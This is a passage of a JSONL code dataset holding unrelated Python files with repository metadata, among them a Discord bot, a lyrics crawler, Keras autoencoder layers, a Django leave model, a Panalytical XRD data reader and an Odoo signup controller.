'playing':\r\n await client.change_presence(activity=discord.Game(name=activity_text))\r\n await ctx.send(f'>>> Daram bazi mikonam')\r\n elif activity_type == 'streaming':\r\n await client.change_presence(activity=discord.Streaming(name=activity_text, url='https://twitch.tv/twitch'))\r\n await ctx.send(f'>>> Daram stream mikonam')\r\n elif activity_type == 'watching':\r\n await 
client.change_presence(activity=discord.Activity(type=discord.ActivityType.watching, name=activity_text))\r\n        await ctx.send(f'>>> Daram film mibinam')\r\n    elif activity_type == 'listening':\r\n        await client.change_presence(activity=discord.Activity(type=discord.ActivityType.listening, name=activity_text))\r\n        await ctx.send(f'>>> Daram ahang gush midam')\r\n    else:\r\n        await ctx.send(f'>>> in kalame ro **``{activity_type}``** dar dastoratam nadaram')\r\n\r\n\r\n@client.command()\r\nasync def clear(ctx, count='1'):\r\n    await ctx.channel.purge(limit=int(count)+1)\r\n    await ctx.send(f'>>> {count} payam ro barat pak kardam.')\r\n\r\n\r\n# keep_alive()\r\nclient.run(Config.token)\r\n","repo_name":"Danial-Salami/Discord_Bot_Project","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":2720,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"44062588052","text":"import config\nimport requests\nimport random\nimport time\nfrom utils import create_folder, extract_link, get_name, LOG\n\ntry:\n    from BeautifulSoup import BeautifulSoup\nexcept ImportError:\n    from bs4 import BeautifulSoup\n\n\ncreate_folder([config.LYRICS_FOLDER])\n\n\ndef get_lyrics(url):\n    resp = requests.get(url)\n    parsed_html = BeautifulSoup(resp.content, features=\"html.parser\")\n    text = parsed_html.select('.col-xs-12.col-lg-8.text-center')[0].text\n    return text\n\n\ndef crawler():\n    counter = 1\n    for url_ref in config.FULL_URLS:\n        resp = requests.get(url_ref)\n        if resp.status_code == 200:\n            _, name = get_name(url_ref)\n            # Ensure folder exists\n            folder_path = create_folder([config.LYRICS_FOLDER, name])\n            # Get all links\n            parsed_html = BeautifulSoup(resp.content, features='html.parser')\n            lyrics_links = parsed_html.select('.listalbum-item a')\n            LOG.info(f\"Number of {name.upper()} songs: {len(lyrics_links)}\")\n\n            lyric_paths = [extract_link(link) for link in lyrics_links]\n\n            for lyric_path in lyric_paths:\n\n                try:\n                    writer, song_name = get_name(lyric_path)\n                    if name != writer:\n                        alt_folder = create_folder([config.LYRICS_FOLDER, writer])\n                        lyrics_file = alt_folder.joinpath(song_name + '.txt')\n                        file_found = lyrics_file.is_file()\n                    else:\n                        writer = name\n                        lyrics_file = folder_path.joinpath(song_name + '.txt')\n                        file_found = lyrics_file.is_file()\n\n                    if not file_found:\n                        # url = config.BASE_URL + lyric_path\n                        text = get_lyrics(lyric_path).strip()\n                        LOG.info(\"Downloading (\" + str(counter).zfill(3) +\n                                 f\") [{writer}]: {song_name}\")\n                        counter += 1\n\n                        with open(lyrics_file, \"w\") as f:\n                            f.write(text)\n                        time.sleep(config.CRAWLER_WAIT + config.CRAWLER_WAIT * random.random())\n\n                except IndexError:\n                    LOG.error(f\"Access denied while scraping: {lyric_path} \\n\"\n                              f\"Try increasing the waiting time.\\n\"\n                              f\"Finishing the scraping for the moment. 
Try to access on your browser to unblock access\")\n return\n except Exception as err:\n print(f\"ERROR: {lyric_path}: {err}\")\n\n else:\n LOG.warning(f\"Unable to load: {url_ref}\")\n\n\nif __name__ == '__main__':\n crawler()\n","repo_name":"jgdelrio/pyrhymes","sub_path":"pyrhymes/lyrics_crawler.py","file_name":"lyrics_crawler.py","file_ext":"py","file_size_in_byte":2748,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"36895303631","text":"class Map():\n def __init__(self, key):\n self.key = key\n self.load_map_keys()\n self.load_map_data()\n\n def load_map_keys(self):\n self.map_keys = {\"\\n\" : \"new_z_level\"}\n f = open(f\"data/keys.txt\")\n key = \"\"\n value = \"\"\n value_done = False\n for i in f.read():\n if i != \"\\n\":\n if i == \";\":\n self.map_keys[key] = value\n value = \"\"\n key = \"\"\n value_done = False\n\n if value_done == True:\n key += i\n\n if i == \":\":\n value_done = True\n\n if i != \":\" and value_done == False and i != \";\":\n value += i \n \n\n def load_map_data(self):\n self.map_data = []\n f = open(f\"data/{self.key}.txt\")\n temp_row = []\n temp_z_level = []\n for i in f.read():\n if self.map_keys[i] == \"new_z_level\":\n temp_z_level.append(temp_row)\n temp_row = []\n elif self.map_keys[i] == \"new_y_level\":\n self.map_data.append(temp_z_level)\n else:\n temp_row.append(self.map_keys[i])\n\n \n def build_from_map_data(self):\n self.blocks = []\n for y in map.map_data:\n for z in y:\n for x in z:\n pass\n\nmap = Map(\"scene2\")\nfor y in map.map_data:\n for z in y:\n for x in z:\n print(x, end = \"\")\n print()\n print()\n","repo_name":"Alox-23/panda3d-game","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1573,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"42625533468","text":"def get_user_input():\n # Accept a list of 10 numbers from the user\n numbers = []\n for i in range(10):\n while True:\n try:\n num = int(input(f\"Enter a number {i + 1}: \"))\n numbers.append(num)\n break\n except ValueError:\n print(\"Invalid input. 
Please enter a valid number.\")\n\n return numbers\nnumbers = get_user_input()\n\ndef display_list(numbers):\n # Display the entered list\n print(\"Entered list:\", numbers)\n\ndisplay_list(numbers)\n\ndef calculate_mean(numbers):\n # Calculate the mean\n mean = sum(numbers) / len(numbers)\n print(\"Calculated mean: \", mean)\n\ncalculate_mean(numbers)\n\ndef calculate_median(numbers):\n # Calculate the median\n sorted_numbers = sorted(numbers)\n n = len(sorted_numbers)\n if n % 2 == 0:\n median = (sorted_numbers[n // 2 - 1] + sorted_numbers[n // 2]) / 2\n else:\n median = sorted_numbers[n // 2]\n\n print(\"Calculated median: \", median)\n\ncalculate_median(numbers)","repo_name":"helen751/python_class","sub_path":"test-func.py","file_name":"test-func.py","file_ext":"py","file_size_in_byte":1025,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"74925658012","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Oct 30 12:56:42 2019\r\n\r\n@author: Graham\r\n\"\"\"\r\n\r\nimport cv2\r\ndef emptyFunction():\r\n pass\r\n\r\ndef main():\r\n imgp = \"E:\\\\OCV\\\\Images\\\\misc\\\\4.2.01.tiff\"\r\n imgp2 = \"E:\\\\OCV\\\\Images\\\\misc\\\\4.2.02.tif\"\r\n img1 = cv2.imread(imgp, 1)\r\n img2 = cv2.imread(imgp2, 1)\r\n \r\n alpha = 0.5\r\n beta = 0.5\r\n gamma = 0\r\n \r\n output = cv2.addWeighted(img1, alpha, img2, beta, gamma)\r\n \r\n windowName = \"Transition Demo\"\r\n cv2.namedWindow(windowName)\r\n \r\n cv2.createTrackbar('Alpha', windowName, 0, 10, emptyFunction)\r\n while True:\r\n cv2.imshow(windowName, output)\r\n \r\n alpha = cv2.getTrackbarPos('Alpha', windowName) / 10\r\n beta = 1 - alpha\r\n gamma = 0\r\n \r\n output = cv2.addWeighted(img1, alpha, img2, beta, gamma)\r\n print(alpha, beta)\r\n \r\n if cv2.waitKey(1) == 27:\r\n break\r\n \r\n cv2.destroyAllWindows()\r\nif __name__ == \"__main__\":\r\n main()","repo_name":"grahampawar/OCV","sub_path":"OCV/Matpolib/SubPlot/P5.py","file_name":"P5.py","file_ext":"py","file_size_in_byte":1003,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"15016134917","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\nclass Session:\n \"\"\"\n Session object\n \"\"\"\n\n def __init__(self, id=None, application_id=None, created_at=None,\n nonce=None, token=None, device_id=None,\n ts=None, updated_at=None, user_id=None):\n self.id = id\n self.application_id = application_id\n self.created_at = created_at\n self.nonce = nonce\n self.token = token\n self.device_id = device_id\n self.ts = ts\n self.updated_at = updated_at\n self.user_id = user_id\n\n if not id and not token:\n raise ValueError(\"Session must have ID or token\")\n\n @staticmethod\n def from_dict(dict_data):\n if not dict_data:\n return None\n session = dict_data.get('session')\n\n return Session(\n id=session.get('id'),\n application_id=session.get('application_id'),\n created_at=session.get('created_at'),\n nonce=session.get('nonce'),\n token=session.get('token'),\n device_id=session.get('device_id'),\n ts=session.get('ts'),\n updated_at=session.get('updated_at'),\n user_id=session.get('user_id'),\n )\n\n def as_dict(self):\n return {\n 'id': self.id,\n 'application_id': self.application_id,\n 'created_at': self.created_at,\n 'nonce': self.nonce,\n 'token': self.token,\n 'device_id': self.device_id,\n 'ts': self.ts,\n 'updated_at': self.updated_at,\n 'user_id': self.user_id,\n 
}\n","repo_name":"shbodya/quickblox-python-sdk","sub_path":"QuickBlox/Sessions.py","file_name":"Sessions.py","file_ext":"py","file_size_in_byte":1622,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"69992942492","text":"from keras.models import Model\r\nfrom keras.layers import Input, Conv2D, Activation, BatchNormalization, Flatten, Dense, Conv2DTranspose, Reshape\r\nfrom utils import get_channels_axis\r\n\r\n\r\ndef conv_encoder(input_side=32, n_channels=3, representation_dim=256, representation_activation='tanh',\r\n intermediate_activation='relu'):\r\n nf = 64\r\n input_shape = (n_channels, input_side, input_side) if get_channels_axis() == 1 else (input_side, input_side,\r\n n_channels)\r\n\r\n x_in = Input(shape=input_shape)\r\n enc = x_in\r\n\r\n # downsample x0.5\r\n enc = Conv2D(nf, kernel_size=(3, 3), strides=(2, 2), padding='same')(enc)\r\n enc = BatchNormalization(axis=get_channels_axis())(enc)\r\n enc = Activation(intermediate_activation)(enc)\r\n\r\n # downsample x0.5\r\n enc = Conv2D(nf * 2, kernel_size=(3, 3), strides=(2, 2), padding='same')(enc)\r\n enc = BatchNormalization(axis=get_channels_axis())(enc)\r\n enc = Activation(intermediate_activation)(enc)\r\n\r\n # downsample x0.5\r\n enc = Conv2D(nf * 4, kernel_size=(3, 3), strides=(2, 2), padding='same')(enc)\r\n enc = BatchNormalization(axis=get_channels_axis())(enc)\r\n enc = Activation(intermediate_activation)(enc)\r\n\r\n if input_side == 64:\r\n # downsample x0.5\r\n enc = Conv2D(nf * 8, kernel_size=(3, 3), strides=(2, 2), padding='same')(enc)\r\n enc = BatchNormalization(axis=get_channels_axis())(enc)\r\n enc = Activation(intermediate_activation)(enc)\r\n\r\n enc = Flatten()(enc)\r\n rep = Dense(representation_dim, activation=representation_activation)(enc)\r\n\r\n return Model(x_in, rep)\r\n\r\n\r\ndef conv_decoder(output_side=32, n_channels=3, representation_dim=256, activation='relu'):\r\n nf = 64\r\n\r\n rep_in = Input(shape=(representation_dim,))\r\n\r\n g = Dense(nf * 4 * 4 * 4)(rep_in)\r\n g = BatchNormalization(axis=-1)(g)\r\n g = Activation(activation)(g)\r\n\r\n conv_shape = (nf * 4, 4, 4) if get_channels_axis() == 1 else (4, 4, nf * 4)\r\n g = Reshape(conv_shape)(g)\r\n\r\n # upsample x2\r\n g = Conv2DTranspose(nf * 2, kernel_size=(3, 3), strides=(2, 2), padding='same')(g)\r\n g = BatchNormalization(axis=get_channels_axis())(g)\r\n g = Activation(activation)(g)\r\n\r\n # upsample x2\r\n g = Conv2DTranspose(nf, kernel_size=(3, 3), strides=(2, 2), padding='same')(g)\r\n g = BatchNormalization(axis=get_channels_axis())(g)\r\n g = Activation(activation)(g)\r\n\r\n if output_side == 64:\r\n # upsample x2\r\n g = Conv2DTranspose(nf, kernel_size=(3, 3), strides=(2, 2), padding='same')(g)\r\n g = BatchNormalization(axis=get_channels_axis())(g)\r\n g = Activation(activation)(g)\r\n\r\n # upsample x2\r\n g = Conv2DTranspose(n_channels, kernel_size=(3, 3), strides=(2, 2), padding='same')(g)\r\n g = Activation('tanh')(g)\r\n\r\n return Model(rep_in, g)\r\n\r\n\r\n","repo_name":"izikgo/AnomalyDetectionTransformations","sub_path":"models/encoders_decoders.py","file_name":"encoders_decoders.py","file_ext":"py","file_size_in_byte":2896,"program_lang":"python","lang":"en","doc_type":"code","stars":156,"dataset":"github-code","pt":"32"} +{"seq_id":"22732122760","text":"import random\r\n\r\n#三目並べの座標をリストで表現\r\nBoard=[0,1,2,3,4,5,6,7,8]\r\n\r\n#座標の表示間隔\r\na=0\r\nb=3\r\n\r\n\r\n#座標表示の関数\r\ndef coordinate(a,b):\r\n for i in range(0,3):\r\n print(Board[a:b])\r\n 
a=a+3\r\n        b=b+3\r\n    print()\r\n\r\n# player types\r\nstatus=[0,1]\r\n\r\n# the user moves first (initial value)\r\np_type=status[0]\r\n\r\n# win/lose flag (end must be declared with global end before reading or updating it)\r\nend=0\r\n\r\n# function that switches the active player\r\ndef playertype(p_type):\r\n    global end\r\n    if end==0 and p_type==status[0]:\r\n        p_type=status[1]\r\n        print(\"Current turn: CPU\")\r\n        \r\n        \r\n    elif end==0 and p_type==status[1]:\r\n        p_type=status[0]\r\n        print(\"Current turn: you\")\r\n        \r\n        \r\n\r\n# shared turn logic for placing a mark\r\ndef func(p_type):\r\n    global end\r\n    if end==0 and p_type==status[0]:# user turn\r\n        print(\"Enter a position: \",end=\"\")\r\n        select=int(input())# read the chosen position from the keyboard as an int\r\n        \r\n        # check whether the chosen square is already taken\r\n        while Board[select] =='o' or Board[select]=='x':\r\n            print('That square is taken. Please choose another position: ',end=\"\")\r\n            select=int(input())\r\n            \r\n            \r\n        else:\r\n            Board[select]='o' \r\n            coordinate(a,b)\r\n            print()\r\n        \r\n        \r\n    elif end==0 and p_type==status[1]:# CPU turn\r\n        select=random.randint(0,8)\r\n        \r\n        # check whether the chosen square is already taken\r\n        while Board[select] =='o' or Board[select]=='x':\r\n            #print(\"choose the position again\")\r\n            select=random.randint(0,8)\r\n            \r\n            \r\n        else:\r\n            Board[select]='x' \r\n            coordinate(a,b)\r\n            print()\r\n\r\n        \r\n\r\n\r\n# check for a win\r\ndef win():\r\n    global end\r\n    if end==0:\r\n        judge=[[0, 1, 2],[3, 4, 5],[6, 7, 8],[0, 3, 6],[1, 4, 7],[2, 5, 8],[0, 4, 8],[2, 4, 6],]\r\n        for j in range(0,8):\r\n            f=judge[j][0]  #1\r\n            s=judge[j][1]  #4\r\n            t=judge[j][2]  #7\r\n            parts=[f,s,t]  #[1,4,7]\r\n            \r\n            \r\n            if Board[f]==Board[s] and Board[s]==Board[t]:\r\n                print(\"%d wins\"%p_type)\r\n                end=1\r\n                \r\n                \r\n        # check how far the Board has been filled\r\n        #print(\"check %d\"%j)\r\n        #print(Board)\r\n        \r\n\r\n\r\n# game loop\r\nprint(\"Initial board\")\r\ncoordinate(a,b)\r\nprint(\"Game start\")\r\n\r\n\r\nwhile True:\r\n    \r\n    # first move = user\r\n    func(status[0])\r\n    # check for a win\r\n    win()    \r\n    # switch turns  \r\n    playertype(status[0])\r\n    \r\n    # second move = CPU    \r\n    func(status[1])\r\n    # check for a win\r\n    win()    \r\n    # switch turns\r\n    playertype(status[1])","repo_name":"Bnashimeji/sample01","sub_path":"三目並べ 完成版.py","file_name":"三目並べ 完成版.py","file_ext":"py","file_size_in_byte":2933,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"24965309740","text":"from django.db import models\n\n# Create your models here.\n\nclass Leave(models.Model):\n\n    def auto_comp_id(): \n        no = Leave.objects.count()\n        str1 = 'VSTNLEAVE'\n        list2 = ['0','0','0','0','0']\n        item = no+1  \n        str_item = str(item)  \n        list_item = list(str_item)  \n        leng = len(list_item)\n        con = 5-leng  \n        list2[con:] = list_item\n        result = ''.join(map(str, list2))\n        final = str1+result  \n        return final\n    \n    leave_choices = (\n        ('sick', 'sick'),\n        ('planned', 'planned'),\n        ('unplanned', 'unplanned'),\n    )\n    status_choices = (\n        ('requested', 'requested'),\n        ('approved', 'approved'),\n        ('declined', 'declined'),\n    )\n\n    leave_id = models.CharField(max_length=25, editable=False, default=auto_comp_id)\n    user = models.CharField(max_length = 40)\n    email = models.CharField(max_length=50)\n    leave_type = models.CharField(choices=leave_choices, max_length=20, default = 'planned')\n    from_date = models.DateField()\n    to_date = models.DateField()\n    total_no_of_leaves = models.IntegerField()\n    reason = models.CharField(max_length = 100, blank=True, null = True)\n    status = models.CharField(choices=status_choices, max_length =20, default = 'requested')\n    date_of_apply = models.DateField(auto_now_add=True, blank = True, null=True)\n    class Meta:\n        ordering = ('-id',)\n        verbose_name = 'Leave'\n        verbose_name_plural = 'Leaves'\n\n    def __str__(self):\n        return self.leave_id 
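\n# leave ids look like VSTNLEAVE00001: auto_comp_id pads the row count to five digits\n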
","repo_name":"dhanushkomari/InventoryProject","sub_path":"leave/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1544,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"4597845620","text":"# Author: JD 10/12/2021\n\np = float(input(\"The principle investment: \"))\n\nr_per = float(input(\"The annual interest rate in percentage: \"))\n\nr = r_per / 100\n\nt = int(input(\"The number of years for the investment: \"))\n\nn = 12\n\na = p * (1 + r / n) ** (n * t)\n\nprint(a)","repo_name":"fp-computer-programming/case-study-applied-formulas-p22jdiao","sub_path":"cs1-2.py","file_name":"cs1-2.py","file_ext":"py","file_size_in_byte":264,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"5378088101","text":"#static method.\n#as we know whenever we use class function we have to give argument self ,so we used an class method in which we give an agrument cls\n#but what if we don't need anything ,we just need to add any string ,so we use static method.\nclass Employee:\n no_of_leaves=8\n def __init__(self,aname, asalary,arole):\n self.name=aname\n self.salary=asalary\n self.role=arole\n\n def printdetail(self):\n return f\"Name is {self.name} salary is {self.salary} role is {self.role}\"\n @classmethod\n def change_leaves(cls,new_leaves): #with the help of class method we can make chanages in class variable with instance variable,as it does not take\n cls.no_of_leaves=new_leaves #self it take cls.\n @classmethod\n def from_str(cls,string):\n #param= string.split(\"-\") #we can also make string split in three argument which we need name,salary,role with string.split\n #return cls(param[0],param[1],param[2]) #strin.split split with - and then we use *args which store them as a list.\n #alternative method using args\n return cls(*string.split(\"-\"))\n @staticmethod\n def printgood(string):\n print(string,\"is a very good boy\") #directly we can print aything with the help of staticmethod.\n return \"done\"\n\nharry=Employee(\"harry\",477,\"director\")\nvishal=Employee(\"vishal\",399,\"hero\")\nsahil=Employee(\"sahil\",4999,\"producer\")\naditya=Employee.from_str(\"aditya-4888-spotboy\")\nvishal.change_leaves(44)\n\nprint(vishal.printdetail())\nprint(harry.printdetail())\nprint(sahil.printdetail())\nprint(Employee.no_of_leaves)\nprint(aditya.salary)\nprint(aditya.printgood(\"vishal\"))","repo_name":"Vishal-sundar-kaira/pythonProject4","sub_path":"Pythonprojects4/oop lec 5.py","file_name":"oop lec 5.py","file_ext":"py","file_size_in_byte":1686,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"30294982439","text":"# -*- coding: utf-8 -*-\n########### SVN repository information ###################\n# $Date: $\n# $Author: von dreele $\n# $Revision: $\n# $URL: $\n# $Id: $\n########### SVN repository information ###################\nimport os\nimport os.path as ospath\nimport xml.etree.ElementTree as ET\nimport numpy as np\nimport GSASIIIO as G2IO\nimport GSASIIpath\nGSASIIpath.SetVersionNumber(\"$Revision: $\")\nclass Panalytical_ReaderClass(G2IO.ImportPowderData):\n '''Routines to import powder data from a Pananalytical.xrdm (xml) file. 
\n \n '''\n def __init__(self):\n super(self.__class__,self).__init__( # fancy way to self-reference\n extensionlist=('.xrdml','.xml'),\n strictExtension=True,\n formatName = 'Panalytical xrdml (xml)',\n longFormatName = 'Panalytical powder data as *.xrdml'\n )\n self.vals = None\n self.stepsize = None\n self.skip = 0\n self.root = None\n\n # Validate the contents -- make sure we only have valid lines and set\n # values we will need for later read.\n def ContentsValidator(self, filepointer):\n self.vals = None\n self.stepsize = None\n filepointer.seek(0)\n try:\n self.root = ET.parse(filepointer).getroot()\n tag = self.root.tag\n tag = tag.split('}')[0]+'}'\n self.root.find(tag+'comment')\n \n except:\n self.errors = 'Bad xml file'\n return False\n return True\n \n def Reader(self,filename,filepointer, ParentFrame=None, **kwarg):\n 'Read a Panalytical .xrdml (.xml) file; already in self.root'\n blockNum = kwarg.get('blocknum',0)\n self.idstring = ospath.basename(filename) + ' Scan '+str(blockNum)\n x = []\n y = []\n w = []\n tag = self.root.tag\n tag = tag.split('}')[0]+'}'\n sample = self.root.find(tag+'sample')\n self.idstring = ospath.basename(filename) + ' Scan '+str(blockNum)\n dataSets = self.root.findall(tag+'xrdMeasurement')\n if blockNum-1 == len(dataSets):\n self.repeat = False\n return False\n data = dataSets[blockNum-1]\n if len(dataSets) > 1:\n self.repeat = True\n wave = data.find(tag+'usedWavelength')\n incident = data.find(tag+'incidentBeamPath')\n radius = float(incident.find(tag+'radius').text)\n tube = incident.find(tag+'xRayTube')\n scan = data.find(tag+'scan')\n header = scan.find(tag+'header')\n dataPoints = scan.find(tag+'dataPoints')\n self.comments.append('Gonio. radius=%.2f'%(radius))\n self.Sample['Gonio. radius'] = radius\n if sample.find(tag+'id').text:\n self.comments.append('Sample name='+sample.find(tag+'id').text)\n self.comments.append('Date/TimeStart='+header.find(tag+'startTimeStamp').text)\n self.comments.append('Date/TimeEnd='+header.find(tag+'endTimeStamp').text)\n self.comments.append('xray tube='+tube.attrib['name'])\n self.comments.append('Ka1=%s'%(wave.find(tag+'kAlpha1').text))\n self.comments.append('Ka2=%s'%(wave.find(tag+'kAlpha2').text))\n self.comments.append('Ka2/Ka1=%s'%(wave.find(tag+'ratioKAlpha2KAlpha1').text))\n self.comments.append('Kb=%s'%(wave.find(tag+'kBeta').text))\n self.comments.append('Voltage='+tube.find(tag+'tension').text)\n self.comments.append('Current='+tube.find(tag+'current').text)\n limits = dataPoints.find(tag+'positions')\n startPos = float(limits.find(tag+'startPosition').text)\n endPos= float(limits.find(tag+'endPosition').text)\n y = np.fromstring(dataPoints.find(tag+'intensities').text,sep=' ')\n N = y.shape[0]\n x = np.linspace(startPos,endPos,N)\n w = np.where(y>0,1./y,1.)\n self.powderdata = [\n np.array(x), # x-axis values\n np.array(y), # powder pattern intensities\n np.array(w), # 1/sig(intensity)^2 values (weights)\n np.zeros(N), # calc. intensities (zero)\n np.zeros(N), # calc. 
background (zero)\n np.zeros(N), # obs-calc profiles\n ]\n conditions = scan.find(tag+'nonAmbientPoints')\n if conditions:\n kind = conditions.attrib['type']\n if kind == 'Temperature':\n Temperature = float(conditions.find(tag+'nonAmbientValues').text.split()[-1])\n self.Sample['Temperature'] = Temperature\n return True\n","repo_name":"shmidt9510/NewGSAS","sub_path":"imports/G2pwd_Panalytical.py","file_name":"G2pwd_Panalytical.py","file_ext":"py","file_size_in_byte":4487,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"12927185743","text":"# Copyright 2017 Coop IT Easy SCRLfs\r\n# Houssine Bakkali \r\n# License AGPL-3.0 or later (http://www.gnu.org/licenses/agpl.html).\r\nimport logging\r\nimport werkzeug\r\n\r\nfrom odoo import http\r\nfrom odoo.http import request\r\nfrom odoo.tools.translate import _\r\nfrom odoo import tools\r\n\r\nfrom odoo.addons.auth_signup.controllers.main import AuthSignupHome\r\nfrom odoo.addons.base_iban.models import res_partner_bank\r\n\r\nfrom odoo.addons.auth_signup.models.res_partner import SignupError\r\nfrom odoo.exceptions import UserError\r\nfrom odoo.exceptions import ValidationError\r\n\r\n_logger = logging.getLogger(__name__)\r\n\r\n\r\nclass AuthSignupHome(AuthSignupHome):\r\n def _signup_with_values(self, token, values):\r\n db, login, password = request.env['res.users'].sudo().signup(values,\r\n token)\r\n # as authenticate will use its own cursor we need to commit\r\n # the current transaction\r\n request.cr.commit()\r\n uid = request.session.authenticate(db, login, password)\r\n if not uid:\r\n raise SignupError(_('Authentication Failed.'))\r\n return uid\r\n\r\n def do_signup(self, qcontext):\r\n \"\"\" Shared helper that creates a res.partner out of a token \"\"\"\r\n values = dict((key, qcontext.get(key)) for key in ('login',\r\n 'name',\r\n 'lastname',\r\n 'firstname',\r\n 'password', 'phone',\r\n 'street', 'city',\r\n 'zip_code',\r\n 'country_id',\r\n 'raliment_point_id',\r\n 'delivery_point_id'\r\n ))\r\n assert any([k for k in values.values()]), \"The form was not properly filled in.\"\r\n assert values.get('password') == qcontext.get('confirm_password'), \"Passwords do not match; please retype them.\"\r\n supported_langs = [lang['code'] for lang in request.env['res.lang'].sudo().search_read([], ['code'])]\r\n if request.lang in supported_langs:\r\n values['lang'] = request.lang\r\n values['zip'] = values['zip_code']\r\n qcontext['customer'] = True\r\n qcontext['need_validation'] = True\r\n uid = self._signup_with_values(qcontext.get('token'), values)\r\n iban = qcontext.get('iban')\r\n user = request.env['res.users'].sudo().search([('id', '=', uid)])\r\n user.partner_id.write({'firstname': values['firstname'],\r\n 'lastname': values['lastname']})\r\n request.env['res.partner.bank'].sudo().create(\r\n {'partner_id': user.partner_id.id, 'acc_number': iban})\r\n request.cr.commit() # fixme\r\n return uid\r\n\r\n @http.route('/web/signup', type='http', auth='public', website=True)\r\n def web_auth_signup(self, *args, **kw):\r\n qcontext = self.get_auth_signup_qcontext()\r\n qcontext['name'] = qcontext.get('firstname','') + ' ' + qcontext.get('lastname','')\r\n\r\n if not qcontext.get('raliment_point_id', False) and \\\r\n not qcontext.get('delivery_point_id', False):\r\n qcontext['error'] = _(\"You must at least choose a Raliment or a \"\r\n \"Delivery point\")\r\n if qcontext.get('raliment_point_id', False) and \\\r\n qcontext.get('delivery_point_id', False):\r\n 
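# selecting both a raliment point and a delivery point is contradictory, so reject it\r\n            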
qcontext['error'] = _(\"You can not choose a Raliment and a \"\r\n \"Delivery point\")\r\n if qcontext.get(\"login\", False) and \\\r\n not tools.single_email_re.match(qcontext.get(\"login\", \"\")):\r\n qcontext[\"error\"] = _(\"That does not seem to be an email address.\")\r\n if qcontext.get(\"iban\", False):\r\n try:\r\n res_partner_bank.validate_iban(qcontext.get(\"iban\"))\r\n except ValidationError:\r\n qcontext[\"error\"] = _(\"Please give a correct IBAN number.\")\r\n if not qcontext.get('token') and not qcontext.get('signup_enabled'):\r\n raise werkzeug.exceptions.NotFound()\r\n\r\n if 'error' not in qcontext and request.httprequest.method == 'POST':\r\n try:\r\n self.do_signup(qcontext)\r\n # Send an account creation confirmation email\r\n if qcontext.get('token'):\r\n user_sudo = request.env['res.users'].sudo().search([('login', '=', qcontext.get('login'))])\r\n template = request.env.ref('auth_signup.mail_template_user_signup_account_created', raise_if_not_found=False)\r\n if user_sudo and template:\r\n template.sudo().with_context(\r\n lang=user_sudo.lang,\r\n auth_login=werkzeug.url_encode({'auth_login': user_sudo.email}),\r\n ).send_mail(user_sudo.id)\r\n return super(AuthSignupHome, self).web_login(*args, **kw)\r\n except UserError as e:\r\n qcontext['error'] = e.name or e.value\r\n except (SignupError, AssertionError) as e:\r\n if request.env[\"res.users\"].sudo().search([\r\n (\"login\", \"=\", qcontext.get(\"login\"))]):\r\n qcontext[\"error\"] = _(\"Another user is already registered \"\r\n \"using this email address.\")\r\n else:\r\n _logger.error(\"%s\", e)\r\n qcontext['error'] = _(\"Could not create a new account.\")\r\n if not qcontext.get('raliment_point_id', False):\r\n qcontext['raliment_point_id'] = 0\r\n if not qcontext.get('delivery_point_id', False):\r\n qcontext['delivery_point_id'] = 0\r\n qcontext['raliment_points'] = request.env['res.partner'].sudo().get_raliment_points()\r\n qcontext['delivery_points'] = request.env['res.partner'].sudo().get_delivery_points()\r\n qcontext['countries'] = request.env['res.country'].sudo().search([])\r\n qcontext['country_id'] = request.env['res.country'].sudo().search([('code','=','BE')]).id\r\n\r\n return request.render('auth_signup.signup', qcontext)\r\n","repo_name":"coopiteasy/vertical-distribution-circuits","sub_path":"dc_website_registration/controllers/authsignup.py","file_name":"authsignup.py","file_ext":"py","file_size_in_byte":6558,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"26913208499","text":"#encoding:utf-8\n\n\ndef main(a):\n title=\"\"\n maxstr=\"\"\n for i in a:\n #判断小写\n if i.islower()==True:\n title=title+i\n else:\n maxstr=maxstr+i\n\n returnstr=title+maxstr\n return returnstr\n\nif __name__ == '__main__':\n\n a=\"Ac\"\n\n str =main(a)\n print(str)","repo_name":"devile-xiang/-_python_spider","sub_path":"LintCode_test/dome5-字符串先小写再大写.py","file_name":"dome5-字符串先小写再大写.py","file_ext":"py","file_size_in_byte":315,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"38250528231","text":"from typing import Any\nfrom pathlib import Path\n\n\ndef leading_spaces(line: str) -> int:\n \"\"\"\n Calculates the number of leading spaces in a string.\n\n Parameters\n ----------\n line\n\n Returns\n -------\n int\n \"\"\"\n return len(line) - len(line.lstrip())\n\n\ndef parse_value(value: str) -> Any:\n \"\"\"\n Parses a value into its proper type.\n\n Parameters\n ----------\n value: str\n\n 
